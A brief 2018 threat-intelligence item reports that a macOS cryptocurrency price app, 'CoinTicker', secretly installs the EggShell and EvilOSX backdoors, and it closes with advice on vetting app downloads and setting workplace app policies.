Mac CryptoCurrency Ticker App Installs Backdoors (Oct 29, 2018)
A MalwareBytes forum user informed the researchers of a malicious macOS application he/she discovered that is masquerading as a cryptocurrency price-checker. The application, called "CoinTicker," does function by showing the current prices of various cryptocurrencies, but it also attempts to install two different backdoors onto the machine running the application. Upon launching on a machine it was downloaded on, CoinTicker subsequently downloads and installs two publicly available backdoors called "EggShell" and "EvilOSX." Both backdoors are relatively flexible in their capabilities because they are open source and therefore could be modified by threat actors.
Recommendation: MalwareBytes researchers note that, at the time of this writing, CoinTicker has stopped functioning. However, this story does portray the potential risk when downloading applications, particularly free applications. Users need to be cautious when downloading applications and review the user feedback on the application and permissions that will be requested upon download. Your company should have policies in place as to which applications are permissible on work machines to keep potential risk levels as low as possible.
Indicators of Compromise (IOCs) associated with this story can be viewed by ThreatStream users here to identify potential malicious activity.